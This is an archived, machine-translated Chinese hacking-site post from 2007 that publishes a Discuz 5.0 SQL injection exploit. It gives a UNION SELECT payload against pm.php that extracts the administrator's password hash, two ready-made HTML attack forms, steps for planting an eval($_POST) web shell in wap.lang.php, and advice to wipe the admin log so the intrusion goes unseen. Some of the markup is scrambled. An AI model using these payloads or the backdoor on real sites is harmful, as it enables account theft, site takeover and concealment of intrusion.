Discuz 5.0 0day + PM SMS bypass method-vulnerability warning-the black bar safety net

2007-04-27T00:00:00
ID MYHACK58:62200715242
Type myhack58
Reporter 佚名
Modified 2007-04-27T00:00:00

Description

SQL: 0) union select password,2,0 from cdb_members where uid=1/ uid=1/ 1 Is the ID value

Obtain the Administrator's md5 password Into the background The forum management module edit details To modify the wap. php insert eval($_POST[tlwbw]) Connection address Site address+/templates/default/wap.lang.php

哈哈 进 过后 台 别 忘 了 清 掉 forumdata/cplog.php

Use the code save for . html | The following is quoted fragment: <! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>Dz5. 0 0day</TITLE> <META http-equiv=Content-Type content="text/html; charset=utf-8"> <META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD> <BODY> <STYLE>BODY { SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #0 0 0 0 0 0; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3 } TABLE { BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse } . tr { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center } . td { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd } . warningColor { FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New" } INPUT { BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #0 0 0 0 0 0; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px } TEXTAREA { BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #0 0 0 0 0 0; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px } A:link { FONT-SIZE: 9pt; COLOR: #0 0 0 0 0 0; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none } TR { FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New" } TD { BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New" } . trHead { FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3 } . inputLogin { BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd } </STYLE>

<SCRIPT language=JavaScript> <!-- test='width="7 6 0" <table align="center" border="0" cellspacing="0"><form cellpadding="0" height="2 2" method="post"><tr><td Exp</td></tr><tr><td class="td"> Dz5. 0 height="1 8" class="trHead"> </td></tr><tr><td <input class="td"> Url: type="text" name="theAction" value="http://www.. net"_ id="theAction" onBlur=this. form. the2Action. value=this. form. theAction. value+"/pm. php? action=send&pmsubmit=yes"><BR><input size="5 0" type="hidden" name="the2Action" value=""> Hash: id="the2Action" type="text" <input value="0094b488"> Msgt<input name="formhash" name="msgto" type="text" value="jackal"><BR>< input size="1 0" name="subject" type="hidden" value="aa"><input size="1 0" name="message" type="hidden" <input value="aa"> SQL: size="1 0 0" type="text" value="0) name="msgtobuddys[]" select union from password,2,0 where cdb_members class="td" uid=1/"></td></tr> <tr><td type="submit" align="center"><input value=" name="Submit" " GOGOGO type="reset" ><input value=" name="Submit32" "></td></tr><tr><td Reset height="2 2" class="trHead"> </td></tr> <tr><td class="td">Powered align="right" <a By title="QQ:*"></a> href="_http://www. net" </tr> 2007.3 </td> </table> </form>'; document. write(ReplaceDemo(test)) //--> </SCRIPT>

<TABLE cellSpacing=0 cellPadding=0 width=7 6 0 align=center border=0> <FORM method=post> <TBODY> <TR> <TD class=td height=2 2> Dz5. 0 Exp</TD></TR> <TR> <TD class=trHead> </TD></TR> <TR> <TD class=td height=1 8> Url: <INPUT id=theAction onblur='this. form. the2Action. value=this. form. theAction. value+"/pm. php? action=send&pmsubmit=yes"' size=5 0 value=http://www. 4evil. org name=theAction><BR><INPUT id=the2Action type=hidden name=the2Action> Hash: <INPUT value=0094b488 name=formhash> Msgt<INPUT size=1 0 value=aspxp name=msgto><BR><INPUT type=hidden size=1 0 value=aa name=subject><INPUT type=hidden value=aa name=message> SQL: <INPUT size=1 0 0 value="0) union select password,2,0 from cdb_members where uid=1/" name=msgtobuddys[]></TD></TR> <TR> <TD class=td align=middle><INPUT onclick=this. form. action=this. form. the2Action. value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR> <TR> <TD class=trHead> </TD></TR> <TR> <TD class=td align=right height=2 2>Just For Fun <A title=QQ:* href="_http://www.. org">****</A>_ 2007.3 </TD></TR></FORM></TBODY></TABLE></BODY></HTML>

PM vulnerability through the SMS verification method: sources 7 cheap BLOG)

<HTML><HEAD><TITLE>discuz</TITLE> <BODY> <a href="http://1v1.name">http://1v1.name</a><FORM name=frm method=post target=_blank>Url: <INPUT size=4 5 name=act> <INPUT size=8 name=formhash> <INPUT type=button value="submit" name=Send><br><br> MySQL:<INPUT size=6 5 value='0) union select password,2,0 from cdb_members where uid=1/*'name=msgtobuddys[]> <input type="text" name="seccodeverify" size="7"> <INPUT TYPE="hidden" NAME="pmsubmit" value="2"> <input type="hidden" name="subject" value="test"> <input type="hidden" name="message" value="test"> </FORM> </BODY></HTML>